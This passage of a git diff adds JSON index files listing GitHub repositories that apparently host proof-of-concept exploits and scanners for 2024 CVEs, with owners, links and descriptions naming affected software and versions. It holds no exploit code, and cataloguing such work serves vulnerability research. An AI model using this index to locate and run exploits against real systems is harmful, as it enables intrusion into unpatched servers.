+ },
+ "html_url": "https:\/\/github.com\/PhinehasNarh\/CVE-2024-4577-Defend",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-24T10:48:24Z",
+ "updated_at": "2024-06-24T11:00:19Z",
+ "pushed_at": "2024-06-24T11:00:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-4701.json b/2024/CVE-2024-4701.json
new file mode 100644
index 0000000000..f133499bda
--- /dev/null
+++ b/2024/CVE-2024-4701.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 799940832,
+ "name": "CVE-2024-4701-POC",
+ "full_name": "JoeBeeton\/CVE-2024-4701-POC",
+ "owner": {
+ "login": "JoeBeeton",
+ "id": 11488268,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11488268?v=4",
+ "html_url": "https:\/\/github.com\/JoeBeeton"
+ },
+ "html_url": "https:\/\/github.com\/JoeBeeton\/CVE-2024-4701-POC",
+ "description": "POC for CVE-2024-4701",
+ "fork": false,
+ "created_at": "2024-05-13T11:58:19Z",
+ "updated_at": "2024-05-23T09:24:10Z",
+ "pushed_at": "2024-05-13T12:56:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-4761.json b/2024/CVE-2024-4761.json
new file mode 100644
index 0000000000..1accbc50e6
--- /dev/null
+++ b/2024/CVE-2024-4761.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 800632738,
+ "name": "CVE-2024-4761",
+ "full_name": "michredteam\/CVE-2024-4761",
+ "owner": {
+ "login": "michredteam",
+ "id": 168865716,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168865716?v=4",
+ "html_url": "https:\/\/github.com\/michredteam"
+ },
+ "html_url": "https:\/\/github.com\/michredteam\/CVE-2024-4761",
+ "description": "High CVE-2024-4761 Exploit ",
+ "fork": false,
+ "created_at": "2024-05-14T17:45:22Z",
+ "updated_at": "2024-06-02T12:44:20Z",
+ "pushed_at": "2024-05-14T18:21:02Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-4875.json b/2024/CVE-2024-4875.json
new file mode 100644
index 0000000000..bd06c76592
--- /dev/null
+++ b/2024/CVE-2024-4875.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 803866868,
+ "name": "CVE-2024-4875",
+ "full_name": "RandomRobbieBF\/CVE-2024-4875",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-4875",
+ "description": "HT Mega – Absolute Addons For Elementor <= 2.5.2 - Missing Authorization to Options Update",
+ "fork": false,
+ "created_at": "2024-05-21T14:15:16Z",
+ "updated_at": "2024-05-21T14:17:24Z",
+ "pushed_at": "2024-05-21T14:17:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-4898.json b/2024/CVE-2024-4898.json
new file mode 100644
index 0000000000..25b1d0e18b
--- /dev/null
+++ b/2024/CVE-2024-4898.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 814085219,
+ "name": "CVE-2024-4898-Poc",
+ "full_name": "truonghuuphuc\/CVE-2024-4898-Poc",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-4898-Poc",
+ "description": "CVE-2024-4898 InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.38 - Missing Authorization to Unauthenticated API setup\/Arbitrary Options Update\/Administrative User Creation",
+ "fork": false,
+ "created_at": "2024-06-12T10:03:14Z",
+ "updated_at": "2024-06-23T14:02:59Z",
+ "pushed_at": "2024-06-12T10:23:05Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 815012905,
+ "name": "CVE-2024-4898-Poc",
+ "full_name": "cve-2024\/CVE-2024-4898-Poc",
+ "owner": {
+ "login": "cve-2024",
+ "id": 172750025,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172750025?v=4",
+ "html_url": "https:\/\/github.com\/cve-2024"
+ },
+ "html_url": "https:\/\/github.com\/cve-2024\/CVE-2024-4898-Poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-14T07:01:58Z",
+ "updated_at": "2024-06-14T07:03:55Z",
+ "pushed_at": "2024-06-14T07:03:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-4956.json b/2024/CVE-2024-4956.json
new file mode 100644
index 0000000000..14f9904a37
--- /dev/null
+++ b/2024/CVE-2024-4956.json
@@ -0,0 +1,416 @@
+[
+ {
+ "id": 804730274,
+ "name": "CVE-2024-4956",
+ "full_name": "banditzCyber0x\/CVE-2024-4956",
+ "owner": {
+ "login": "banditzCyber0x",
+ "id": 96621905,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96621905?v=4",
+ "html_url": "https:\/\/github.com\/banditzCyber0x"
+ },
+ "html_url": "https:\/\/github.com\/banditzCyber0x\/CVE-2024-4956",
+ "description": "Nexus Repository Manager 3 Unauthenticated Path Traversal",
+ "fork": false,
+ "created_at": "2024-05-23T06:47:13Z",
+ "updated_at": "2024-05-26T07:52:23Z",
+ "pushed_at": "2024-05-26T07:52:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804764039,
+ "name": "CVE-2024-4956",
+ "full_name": "xungzzz\/CVE-2024-4956",
+ "owner": {
+ "login": "xungzzz",
+ "id": 78672731,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78672731?v=4",
+ "html_url": "https:\/\/github.com\/xungzzz"
+ },
+ "html_url": "https:\/\/github.com\/xungzzz\/CVE-2024-4956",
+ "description": "CVE-2024-4956 Nuclei Template",
+ "fork": false,
+ "created_at": "2024-05-23T08:15:08Z",
+ "updated_at": "2024-05-26T08:07:28Z",
+ "pushed_at": "2024-05-23T08:16:07Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804844993,
+ "name": "CVE-2024-4956",
+ "full_name": "erickfernandox\/CVE-2024-4956",
+ "owner": {
+ "login": "erickfernandox",
+ "id": 2186082,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2186082?v=4",
+ "html_url": "https:\/\/github.com\/erickfernandox"
+ },
+ "html_url": "https:\/\/github.com\/erickfernandox\/CVE-2024-4956",
+ "description": "Unauthenticated Path Traversal in Nexus Repository 3 ",
+ "fork": false,
+ "created_at": "2024-05-23T11:39:06Z",
+ "updated_at": "2024-06-09T23:12:10Z",
+ "pushed_at": "2024-05-23T20:59:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 805374933,
+ "name": "CVE-2024-4956",
+ "full_name": "gmh5225\/CVE-2024-4956",
+ "owner": {
+ "login": "gmh5225",
+ "id": 13917777,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4",
+ "html_url": "https:\/\/github.com\/gmh5225"
+ },
+ "html_url": "https:\/\/github.com\/gmh5225\/CVE-2024-4956",
+ "description": "Unauthenticated Path Traversal in Nexus Repository 3 ",
+ "fork": false,
+ "created_at": "2024-05-24T12:45:45Z",
+ "updated_at": "2024-05-30T15:19:22Z",
+ "pushed_at": "2024-05-23T20:59:10Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 806026716,
+ "name": "CVE-2024-4956-Bulk-Scanner",
+ "full_name": "ifconfig-me\/CVE-2024-4956-Bulk-Scanner",
+ "owner": {
+ "login": "ifconfig-me",
+ "id": 25315805,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25315805?v=4",
+ "html_url": "https:\/\/github.com\/ifconfig-me"
+ },
+ "html_url": "https:\/\/github.com\/ifconfig-me\/CVE-2024-4956-Bulk-Scanner",
+ "description": "[CVE-2024-4956] Nexus Repository Manager 3 Unauthenticated Path Traversal Bulk Scanner",
+ "fork": false,
+ "created_at": "2024-05-26T06:50:48Z",
+ "updated_at": "2024-06-04T18:52:14Z",
+ "pushed_at": "2024-05-27T07:25:55Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 806352821,
+ "name": "CVE-2024-4956-PoC",
+ "full_name": "thinhap\/CVE-2024-4956-PoC",
+ "owner": {
+ "login": "thinhap",
+ "id": 104897146,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104897146?v=4",
+ "html_url": "https:\/\/github.com\/thinhap"
+ },
+ "html_url": "https:\/\/github.com\/thinhap\/CVE-2024-4956-PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-27T03:09:36Z",
+ "updated_at": "2024-05-27T03:14:25Z",
+ "pushed_at": "2024-05-27T03:14:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 806592885,
+ "name": "CVE-2024-4956",
+ "full_name": "eoslvs\/CVE-2024-4956",
+ "owner": {
+ "login": "eoslvs",
+ "id": 170684196,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170684196?v=4",
+ "html_url": "https:\/\/github.com\/eoslvs"
+ },
+ "html_url": "https:\/\/github.com\/eoslvs\/CVE-2024-4956",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-27T13:48:15Z",
+ "updated_at": "2024-05-27T13:48:15Z",
+ "pushed_at": "2024-05-27T13:48:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 807147595,
+ "name": "CVE-2024-4956",
+ "full_name": "GoatSecurity\/CVE-2024-4956",
+ "owner": {
+ "login": "GoatSecurity",
+ "id": 153397256,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153397256?v=4",
+ "html_url": "https:\/\/github.com\/GoatSecurity"
+ },
+ "html_url": "https:\/\/github.com\/GoatSecurity\/CVE-2024-4956",
+ "description": "CVE-2024-4956 : Nexus Repository Manager 3 poc exploit",
+ "fork": false,
+ "created_at": "2024-05-28T15:05:31Z",
+ "updated_at": "2024-05-30T04:49:55Z",
+ "pushed_at": "2024-05-29T11:54:26Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 807309759,
+ "name": "CVE-2024-4956",
+ "full_name": "TypicalModMaker\/CVE-2024-4956",
+ "owner": {
+ "login": "TypicalModMaker",
+ "id": 52781429,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52781429?v=4",
+ "html_url": "https:\/\/github.com\/TypicalModMaker"
+ },
+ "html_url": "https:\/\/github.com\/TypicalModMaker\/CVE-2024-4956",
+ "description": "Proof-Of-Concept (POC) for CVE-2024-4956",
+ "fork": false,
+ "created_at": "2024-05-28T21:20:53Z",
+ "updated_at": "2024-05-29T15:04:40Z",
+ "pushed_at": "2024-05-29T07:37:15Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2024-4956",
+ "exploit",
+ "poc",
+ "proof-of-concept",
+ "proofofconcept",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808014744,
+ "name": "CVE-2024-4956-Sonatype-Nexus-Repository-Manager",
+ "full_name": "Praison001\/CVE-2024-4956-Sonatype-Nexus-Repository-Manager",
+ "owner": {
+ "login": "Praison001",
+ "id": 60835238,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4",
+ "html_url": "https:\/\/github.com\/Praison001"
+ },
+ "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-4956-Sonatype-Nexus-Repository-Manager",
+ "description": "Exploit for CVE-2024-4956 affecting all previous Sonatype Nexus Repository 3.x OSS\/Pro versions up to and including 3.68.0",
+ "fork": false,
+ "created_at": "2024-05-30T08:04:27Z",
+ "updated_at": "2024-06-01T11:11:39Z",
+ "pushed_at": "2024-06-01T11:11:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 809568326,
+ "name": "CVE-2024-4956",
+ "full_name": "Cappricio-Securities\/CVE-2024-4956",
+ "owner": {
+ "login": "Cappricio-Securities",
+ "id": 102907425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4",
+ "html_url": "https:\/\/github.com\/Cappricio-Securities"
+ },
+ "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-4956",
+ "description": "Sonatype Nexus Repository Manager 3 (LFI)",
+ "fork": false,
+ "created_at": "2024-06-03T02:49:20Z",
+ "updated_at": "2024-06-24T10:15:14Z",
+ "pushed_at": "2024-06-24T10:14:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bugbounty",
+ "bugbounty-tool",
+ "bugbounty-tools",
+ "cve-2024-4956",
+ "cve-2024-4956-exploit",
+ "cve-2024-4956-poc",
+ "cve-2024-4956-scanner",
+ "lfi",
+ "lfi-detection",
+ "lfi-exploit",
+ "lfi-exploitation",
+ "lfi-exploiter",
+ "lfi-scanner",
+ "local-file-inclusion",
+ "sonatype-nexus-repository-manager-3"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 810916474,
+ "name": "CVE-2024-4956",
+ "full_name": "fin3ss3g0d\/CVE-2024-4956",
+ "owner": {
+ "login": "fin3ss3g0d",
+ "id": 62859381,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62859381?v=4",
+ "html_url": "https:\/\/github.com\/fin3ss3g0d"
+ },
+ "html_url": "https:\/\/github.com\/fin3ss3g0d\/CVE-2024-4956",
+ "description": "CVE-2024-4956 Python exploitation utility",
+ "fork": false,
+ "created_at": "2024-06-05T15:37:39Z",
+ "updated_at": "2024-06-25T16:15:27Z",
+ "pushed_at": "2024-06-25T16:15:23Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812597751,
+ "name": "CVE-2024-4956",
+ "full_name": "verylazytech\/CVE-2024-4956",
+ "owner": {
+ "login": "verylazytech",
+ "id": 172168670,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4",
+ "html_url": "https:\/\/github.com\/verylazytech"
+ },
+ "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-4956",
+ "description": "POC - CVE-2024–4956 - Nexus Repository Manager 3 Unauthenticated Path Traversal",
+ "fork": false,
+ "created_at": "2024-06-09T10:57:29Z",
+ "updated_at": "2024-06-14T14:40:58Z",
+ "pushed_at": "2024-06-09T12:53:09Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-5084.json b/2024/CVE-2024-5084.json
new file mode 100644
index 0000000000..1e5eb9ceda
--- /dev/null
+++ b/2024/CVE-2024-5084.json
@@ -0,0 +1,101 @@
+[
+ {
+ "id": 805639631,
+ "name": "CVE-2024-5084",
+ "full_name": "KTN1990\/CVE-2024-5084",
+ "owner": {
+ "login": "KTN1990",
+ "id": 33407405,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4",
+ "html_url": "https:\/\/github.com\/KTN1990"
+ },
+ "html_url": "https:\/\/github.com\/KTN1990\/CVE-2024-5084",
+ "description": "WordPress Hash Form – Drag & Drop Form Builder <= 1.1.0 - Unauthenticated Arbitrary File Upload to Remote Code Execution",
+ "fork": false,
+ "created_at": "2024-05-25T03:49:04Z",
+ "updated_at": "2024-06-19T22:37:57Z",
+ "pushed_at": "2024-05-31T19:51:13Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "exploit",
+ "exploitwordpress",
+ "shell",
+ "upload",
+ "vulnerability",
+ "wordpress",
+ "wordpressexploit"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 806742640,
+ "name": "CVE-2024-5084",
+ "full_name": "Chocapikk\/CVE-2024-5084",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-5084",
+ "description": "Hash Form – Drag & Drop Form Builder <= 1.1.0 - Unauthenticated Arbitrary File Upload to Remote Code Execution",
+ "fork": false,
+ "created_at": "2024-05-27T20:04:10Z",
+ "updated_at": "2024-05-30T23:33:49Z",
+ "pushed_at": "2024-05-28T12:30:51Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 811151698,
+ "name": "CVE-2024-5084",
+ "full_name": "k3lpi3b4nsh33\/CVE-2024-5084",
+ "owner": {
+ "login": "k3lpi3b4nsh33",
+ "id": 118002757,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118002757?v=4",
+ "html_url": "https:\/\/github.com\/k3lpi3b4nsh33"
+ },
+ "html_url": "https:\/\/github.com\/k3lpi3b4nsh33\/CVE-2024-5084",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-06T03:25:44Z",
+ "updated_at": "2024-06-06T03:29:27Z",
+ "pushed_at": "2024-06-06T03:29:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-5326.json b/2024/CVE-2024-5326.json
new file mode 100644
index 0000000000..1c6dea2ea0
--- /dev/null
+++ b/2024/CVE-2024-5326.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 808885711,
+ "name": "CVE-2024-5326-Poc",
+ "full_name": "truonghuuphuc\/CVE-2024-5326-Poc",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-5326-Poc",
+ "description": "CVE-2024-5326 Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX <= 4.1.2 - Missing Authorization to Arbitrary Options Update",
+ "fork": false,
+ "created_at": "2024-06-01T04:23:54Z",
+ "updated_at": "2024-06-06T07:00:27Z",
+ "pushed_at": "2024-06-01T04:39:02Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 815016982,
+ "name": "CVE-2024-5326-Poc",
+ "full_name": "cve-2024\/CVE-2024-5326-Poc",
+ "owner": {
+ "login": "cve-2024",
+ "id": 172750025,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172750025?v=4",
+ "html_url": "https:\/\/github.com\/cve-2024"
+ },
+ "html_url": "https:\/\/github.com\/cve-2024\/CVE-2024-5326-Poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-14T07:12:29Z",
+ "updated_at": "2024-06-14T07:15:23Z",
+ "pushed_at": "2024-06-14T07:15:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-5522.json b/2024/CVE-2024-5522.json
new file mode 100644
index 0000000000..67069277d1
--- /dev/null
+++ b/2024/CVE-2024-5522.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 808441201,
+ "name": "CVE-2024-5522-Poc",
+ "full_name": "truonghuuphuc\/CVE-2024-5522-Poc",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-5522-Poc",
+ "description": "CVE-2024-5522 HTML5 Video Player <= 2.5.26 - Unauthenticated SQL Injection",
+ "fork": false,
+ "created_at": "2024-05-31T04:41:46Z",
+ "updated_at": "2024-05-31T06:56:48Z",
+ "pushed_at": "2024-05-31T06:44:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-5806.json b/2024/CVE-2024-5806.json
new file mode 100644
index 0000000000..609ab41a44
--- /dev/null
+++ b/2024/CVE-2024-5806.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 819504418,
+ "name": "watchTowr-vs-progress-moveit_CVE-2024-5806",
+ "full_name": "watchtowrlabs\/watchTowr-vs-progress-moveit_CVE-2024-5806",
+ "owner": {
+ "login": "watchtowrlabs",
+ "id": 99977116,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4",
+ "html_url": "https:\/\/github.com\/watchtowrlabs"
+ },
+ "html_url": "https:\/\/github.com\/watchtowrlabs\/watchTowr-vs-progress-moveit_CVE-2024-5806",
+ "description": "Exploit for the CVE-2024-5806",
+ "fork": false,
+ "created_at": "2024-06-24T16:28:35Z",
+ "updated_at": "2024-06-26T04:29:58Z",
+ "pushed_at": "2024-06-24T16:52:12Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-6028.json b/2024/CVE-2024-6028.json
new file mode 100644
index 0000000000..4eb3b8dbef
--- /dev/null
+++ b/2024/CVE-2024-6028.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 819950639,
+ "name": "CVE-2024-6028-Poc",
+ "full_name": "truonghuuphuc\/CVE-2024-6028-Poc",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-6028-Poc",
+ "description": "CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Unauthenticated SQL Injection via 'ays_questions' Parameter",
+ "fork": false,
+ "created_at": "2024-06-25T13:55:27Z",
+ "updated_at": "2024-06-26T01:17:58Z",
+ "pushed_at": "2024-06-26T01:17:55Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-65230.json b/2024/CVE-2024-65230.json
new file mode 100644
index 0000000000..4fdbe9ec38
--- /dev/null
+++ b/2024/CVE-2024-65230.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 747127213,
+ "name": "cve-2024-65230",
+ "full_name": "CBaekhyunC\/cve-2024-65230",
+ "owner": {
+ "login": "CBaekhyunC",
+ "id": 157479885,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/157479885?v=4",
+ "html_url": "https:\/\/github.com\/CBaekhyunC"
+ },
